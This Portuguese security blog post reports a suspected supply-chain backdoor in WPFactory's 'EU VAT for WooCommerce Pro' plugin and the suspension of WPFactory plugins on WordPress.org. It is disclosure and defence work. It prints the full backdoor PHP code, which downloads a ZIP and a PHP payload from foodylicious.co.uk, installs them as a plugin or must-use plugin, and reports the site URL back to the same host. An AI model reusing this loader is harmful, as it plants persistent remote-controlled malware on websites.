Violação de segurança na WPFactory: 170 000 sites WordPress expostos

| Notícias |

O WordPress continua a ser o sistema de gestão de conteúdos mais utilizado no mundo, impulsionando mais de 40% de todos os websites na internet. Desde websites de pequenas empresas e blogs pessoais a grandes plataformas empresariais e infraestruturas de comércio eletrónico, o CMS tornou-se a espinha dorsal da web moderna. A sua popularidade deriva da sua flexibilidade, do ecossistema aberto e do vasto número de plugins disponíveis para expandir a sua funcionalidade.

No entanto, este mesmo ecossistema tornou-se também um dos maiores desafios de segurança do WordPress.

Na Ferber Enterprises, a nossa equipa de cibersegurança monitoriza continuamente as ameaças que afetam o ecossistema WordPress, uma vez que as vulnerabilidades em plugins, temas ou cadeias de abastecimento podem rapidamente degenerar em ataques em grande escala que afetam milhares de sites em todo o mundo. Nos últimos anos, os atacantes têm vindo a visar cada vez mais os criadores de plugins e as infraestruturas de distribuição, em vez de sites individuais, permitindo que o código malicioso se propague através de atualizações de software de confiança e canais oficiais de download.

Esta semana, surgiu uma grande controvérsia envolvendo a WPFactory, uma conhecida empresa desenvolvedora de plugins para o WordPress, cujos produtos estão instalados em mais de 170 000 sites em todo o mundo. Mais de 80 plugins associados à empresa foram temporariamente suspensos no WordPress.org depois de a nossa equipa de cibersegurança da WPFactory ter descoberto uma suspeita de backdoor na versão premium de um dos seus plugins.

O incidente suscitou sérias preocupações em toda a comunidade WordPress relativamente à segurança da cadeia de suprimentos de software, aos processos de revisão de plugins e à crescente sofisticação dos ataques que visam o ecossistema de código aberto.

A Descoberta do Comportamento Suspeito do Plugin

O problema veio a lume pela primeira vez depois de a nossa equipa de cibersegurança da Ferber Enterprises ter detetado um comportamento anómalo durante os testes à versão premium do plugin «EU VAT for WooCommerce Pro», distribuído diretamente a partir do seu site oficial.

Inicialmente, a investigação começou após o plugin gerar um erro fatal durante a instalação. Durante a resolução do problema, os nossos analistas identificaram um ficheiro PHP suspeito denominado class-alg-wc-eu-vat-customer.php. O ficheiro parecia executar um comportamento totalmente inconsistente com a funcionalidade esperada de um plugin WooCommerce VAT.

class-alg-wc-eu-vat-customer.php 
<?php
require_once dirname(__FILE__, 5) . '/wp-load.php';
$h = strtolower(preg_replace('/:\d+$/', '', $_SERVER['HTTP_HOST'] ?? ''));
$s = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
$ch = curl_init("$s://$h/wp-content/plugins/eu-vat-for-woocommerce-pro/eu-vat-for-woocommerce-pro.php");
curl_setopt_array($ch, [
    CURLOPT_NOBODY => 1,
    CURLOPT_RETURNTRANSFER => 1,
    CURLOPT_TIMEOUT => 10,
    CURLOPT_SSL_VERIFYPEER => 0
]);
curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($code !== 403 || ($_GET['scaramooch'] ?? '') === 'refresh') {
    $url = 'https://foodylicious.co.uk/change/akismet-pro.zip';
    $zipPath = sys_get_temp_dir() . '/plugin.zip';
    $zipData = file_get_contents($url);
    if ($zipData === false) {
        exit('Download failed');
    }
    file_put_contents($zipPath, $zipData);
    $zip = new ZipArchive;
    if ($zip->open($zipPath) === TRUE) {
        $zip->extractTo(dirname(__FILE__, 5) . '/wp-content/plugins/');
        $zip->close();
    } else {
        exit('ZIP open failed');
    }
    unlink($zipPath);
} else {
    $url = "https://foodylicious.co.uk/change/scara.php";
    $code = file_get_contents($url);
    if ($code !== false) {

        $baseDir = dirname(__FILE__, 4);

        $folderName = 'mu-plugins';

        $dir = $baseDir . '/' . $folderName;

        if (!is_dir($dir)) {
            mkdir($dir, 0755, true);
        }

        file_put_contents($dir . '/wp-redis.php', $code);
    }
}
$data = [
    'site_url' => get_site_url() . '/wp-content/plugins/eu-vat-for-woocommerce-pro/',
];
wp_remote_post('https://foodylicious.co.uk/change/tracks.php', [
    'body' => $data,
    'timeout' => 10,
]);

De acordo com a nossa análise, o código tentou:

  • Descarregar um arquivo ZIP externo de um servidor remoto
  • Modificar as pastas principais do WordPress
  • Comunicar com infraestrutura externa
  • Potencialmente executar payloads remotos em websites afetados

Estes indicadores sugeriram imediatamente a possível presença de uma backdoor oculta ou de uma comprometimento malicioso da cadeia de abastecimento.

O que tornou a situação particularmente alarmante foi o facto de o plugin não ter sido obtido a partir de um espelho não oficial ou de um repositório pirata. O pacote foi descarregado diretamente do portal oficial de clientes da WPFactory, reforçando as preocupações de que o próprio canal de distribuição possa ter sido comprometido.

Na Ferber Enterprises, documentámos imediatamente o incidente e iniciámos um processo de divulgação responsável, contactando a WPFactory diretamente através do GitHub.

Resposta inicial da WPFactory

A WPFactory respondeu inicialmente afirmando que o ficheiro e o comportamento suspeitos descritos no relatório não faziam parte do seu código-fonte oficial.

Um representante da empresa sugeriu várias explicações alternativas, incluindo:

  • Uma instalação local modificada
  • Um ambiente de website comprometido
  • Uma versão desatualizada de um plugin
  • Uma fonte de download potencialmente adulterada

A empresa declarou também que não conseguiu inspecionar em segurança o ficheiro ZIP fornecido, pois o navegador assinalou o arquivo como potencialmente inseguro.

A nossa equipa de cibersegurança esclareceu posteriormente que o plugin tinha sido descarregado diretamente do site oficial da WPFactory e que o ficheiro suspeito continuava presente mesmo após o descarregamento de uma nova cópia da versão 4.6.1 a partir da mesma fonte.

Este pormenor tornou-se fundamental para a investigação. Se vários downloads independentes do canal de distribuição oficial continham sistematicamente o mesmo código suspeito, a possibilidade de um site local ter sido comprometido tornava-se cada vez mais improvável. Apesar destas conclusões, a WPFactory afirmou inicialmente que não conseguia reproduzir o problema do seu lado e alegou que o ficheiro suspeito não existia no pacote oficial do plugin.

A empresa solicitou então acesso de administrador e acesso FTP ao ambiente afetado, a fim de prosseguir com a investigação. Na Ferber Enterprises, rejeitámos esse pedido por motivos de cibersegurança. Conceder acesso privilegiado ao servidor a um fornecedor cuja própria infraestrutura poderia ter sido comprometida teria representado um risco de segurança inaceitável. Em vez disso, a nossa equipa continuou a fornecer provas técnicas, incluindo uma demonstração em vídeo que mostrava o comportamento suspeito do plugin imediatamente após a instalação.

Escalonamento para WordPress.org

À medida que a investigação avançava, aumentavam as preocupações quanto à potencial dimensão do problema. A WPFactory mantém um vasto portfólio de plugins, composto por mais de 65 plugins, com mais de 170 000 instalações ativas no total. Qualquer violação que afetasse a infraestrutura de distribuição da empresa poderia, por conseguinte, ter consequências generalizadas em todo o ecossistema do WordPress.

A nossa equipa encaminhou o problema diretamente para o WordPress.org, com o objetivo de impedir que outros utilizadores instalassem pacotes potencialmente comprometidos enquanto a investigação estava em curso. Posteriormente, o WordPress.org tomou a medida extraordinária de retirar temporariamente mais de 80 plugins WPFactory do repositório oficial.

Esta medida chamou imediatamente a atenção de toda a comunidade de segurança do WordPress, uma vez que o encerramento em massa de plugins desta magnitude é relativamente raro e costuma indicar problemas graves ainda por resolver. Na sequência da escalada do caso, a WPFactory reconheceu posteriormente que o problema parecia ser legítimo e pediu desculpa por não ter agido mais rapidamente após a denúncia inicial. Representantes da empresa afirmaram que estavam a investigar ativamente o assunto e a trabalhar para encontrar uma solução. Uma hipótese levantada internamente pela WPFactory sugeria que um pacote de plugins desatualizado ou armazenado em cache poderia ter sido involuntariamente disponibilizado através da sua infraestrutura.

No entanto, a nossa equipa de cibersegurança discordou desta avaliação. O comportamento observado indicava fortemente um problema de segurança mais profundo, potencialmente envolvendo sistemas de compilação ou distribuição comprometidos, ou injeção de código não autorizada em ficheiros de plugins para download.

Porque Este Incidente Importa

A controvérsia em torno do WPFactory põe em evidência uma ameaça crescente à cibersegurança conhecida como «ataque à cadeia de abastecimento de software». Tradicionalmente, os atacantes concentravam-se em comprometer sites individuais diretamente através de ataques de força bruta ou de vulnerabilidades em plugins. Atualmente, os autores das ameaças visam cada vez mais os próprios fornecedores de software, uma vez que comprometer um fornecedor de confiança permite que o código malicioso se espalhe por milhares de sites simultaneamente.

Esta estratégia já foi observada em vários incidentes de cibersegurança de grande destaque que afetaram ecossistemas de software globais na última década. Especificamente no ecossistema WordPress, os desenvolvedores de plugins representam alvos atrativos porque os plugins são inerentemente confiáveis pelos administradores e frequentemente operam com permissões elevadas.

Se for introduzido código malicioso num pacote de plugins distribuído através de um canal oficial, os sites afetados podem, sem o saberem, instalar eles próprios malware. No caso do plugin suspeito WPFactory, as potenciais consequências são graves.

Com base na nossa análise, o comportamento identificado poderia teoricamente permitir que os atacantes:

  • Implementar malware adicional
  • Injetar spam de SEO
  • Criar backdoors persistentes
  • Exfiltrar dados sensíveis
  • Modificar instalações WordPress remotamente
  • Manter acesso não autorizado por períodos prolongados

O perigo de tais ataques reside na sua furtividade. As backdoors modernas são frequentemente projetadas para permanecerem inativas durante meses antes de serem ativadas, o que torna a deteção significativamente mais difícil. No início deste mês, a equipa do WordPress Plugins informou ter encerrado mais de 30 plugins após código malicioso oculto, incorporado num portfólio de plugins diferente, ter permanecido inativo durante aproximadamente oito meses antes de eventualmente ser ativado e injetar spam SEO em websites.

Esta tendência demonstra como os atacantes estão a priorizar cada vez mais a persistência e a ativação retardada para contornar os mecanismos de deteção.

Uma Crise de Segurança Mais Ampla no Ecossistema WordPress

O incidente WPFactory também põe em evidência desafios de segurança sistémicos mais amplos que afetam o WordPress no seu conjunto. O ecossistema de plugins expandiu-se drasticamente na última década, com dezenas de milhares de plugins disponíveis tanto em mercados oficiais como comerciais. Embora este ecossistema estimule a inovação e a flexibilidade, também cria uma enorme complexidade para a supervisão da segurança.

De acordo com o relatório “State of WordPress Security in 2026” da Patchstack, cerca de 461 mil vulnerabilidades conhecidas não foram corrigidas antes da sua divulgação pública. Esta estatística reflete a pressão crescente a que estão sujeitos tanto os programadores de plugins como os investigadores de segurança e os responsáveis pela manutenção dos repositórios.

Ao mesmo tempo, a fila oficial de revisão de plugins do WordPress ultrapassa alegadamente os 4.000 plugins à espera de revisão. Números como estes ilustram o imenso desafio de manter a garantia de qualidade e a auditoria de segurança em escala.

Muitos criadores de plugins são pequenas equipas com recursos de segurança limitados. Outros gerem dezenas de plugins em simultâneo, ao mesmo tempo que implementam estratégias de crescimento comercial agressivas que envolvem aquisições e a expansão do portfólio. A própria WPFactory expandiu-se recentemente através de aquisições, incluindo a compra da Extend-WP e dos seus 19 plugins em 2025, seguida da aquisição da WBW e de vários plugins adicionais ainda nesse ano.

A rápida expansão do portefólio pode criar complexidades operacionais que dificultam a auditoria de código, a gestão de infraestruturas e a verificação da integridade das publicações. Os atacantes estão bem cientes destas realidades. Cada vez mais, concentram-se em explorar práticas de segurança operacionais fracas dentro dos fornecedores de software, em vez de visarem diretamente os utilizadores finais.

A Importância Crescente da Segurança da Cadeia de Abastecimento

Incidentes como este reforçam a necessidade urgente de práticas mais robustas de segurança da cadeia de abastecimento em todo o ecossistema WordPress.

Na Ferber Enterprises, a nossa equipa de cibersegurança recomenda vivamente que os programadores de plugins adotem várias medidas de proteção essenciais, incluindo:

  • Assinatura de pacote criptográfico
  • Pipelines de CI/CD seguras
  • Autenticação multifator obrigatória
  • Segmentação de infraestrutura
  • Monitorização contínua de integridade
  • Auditorias de código independentes
  • Sistemas de compilação reproduzíveis

Os administradores de websites devem também fortalecer a sua própria postura de segurança. Nem mesmo os plugins descarregados de fontes oficiais ou confiáveis devem ser considerados intrinsecamente seguros.

As organizações que gerem infraestruturas críticas de WordPress devem considerar:

  • Manutenção de ambientes de staging
  • Monitorização do tráfego de saída
  • A digitalizar plugins antes da implementação
  • Limitar o uso de plugins
  • Aplicar controlos de acesso de privilégio mínimo
  • Implementar a monitorização da integridade de ficheiros
  • Utilizando Web Application Firewalls (WAFs) Geridos

Em ambientes empresariais, a validação da cadeia de fornecimento está a tornar-se tão importante como a gestão tradicional de vulnerabilidades. A suposição de que os canais de software oficiais são sempre seguros já não é realista no panorama de ameaças atual.

Reações da Comunidade e Investigação em Curso

A controvérsia espalhou-se rapidamente pela comunidade WordPress depois de programadores, investigadores de segurança e fornecedores de infraestrutura terem começado a discutir o problema publicamente.

Várias figuras conhecidas dentro do ecossistema ampliaram a consciencialização sobre a situação, incluindo programadores que publicaram listas de plugins temporariamente encerrados e incentivaram os administradores a auditar os seus ambientes.

Entretanto, a nossa equipa da Ferber Enterprises continua a analisar as amostras de plugins suspeitos e a monitorizar a procura de indicadores adicionais de comprometimento que possam afetar sites WordPress em todo o mundo.

À data da publicação, a WPFactory confirmou a existência do problema e afirmou que está a trabalhar ativamente para o resolver.

No entanto, muitas questões permanecem por responder:

  • A infraestrutura de distribuição oficial foi comprometida?
  • Durante quanto tempo é que os pacotes maliciosos foram potencialmente distribuídos?
  • Foram afetados plugins adicionais?
  • As contas de clientes ou os sistemas de download foram violados?
  • Os atacantes obtiveram acesso persistente à infraestrutura interna?
  • Podem existir cargas úteis adicionais em estado dormente?

Até que estas questões sejam totalmente resolvidas, a cautela continua a ser essencial.

O Futuro da Segurança do WordPress

O incidente WPFactory poderá vir a tornar-se, em última análise, mais um exemplo marcante dos desafios de cibersegurança que o ecossistema web de código aberto enfrenta.

O WordPress potencia uma enorme fatia da economia global da internet. Qualquer comprometimento em larga escala que afete os desenvolvedores de plugins pode, portanto, ter consequências que se estendem muito para além dos sites individuais.

À medida que os atacantes continuam a evoluir no sentido de comprometer a cadeia de abastecimento e de utilizar técnicas de persistência furtiva, a segurança dos plugins já não pode ser tratada como uma preocupação secundária. Na Ferber Enterprises, acreditamos que este evento serve como um lembrete fundamental de que a cibersegurança não se resume apenas à proteção dos próprios sites, mas também à proteção de todas as camadas da cadeia de distribuição de software.

A confiança em ecossistemas abertos depende da transparência, resposta rápida a incidentes e práticas de segurança operacional robustas. O ecossistema WordPress enfrenta agora um momento importante.

A forma como os programadores, os mantenedores de repositórios, os fornecedores de alojamento e as equipas de segurança responderem a incidentes como este ajudará a determinar se o WordPress conseguirá continuar a manter a confiança de milhões de empresas e organizações que dependem dele diariamente.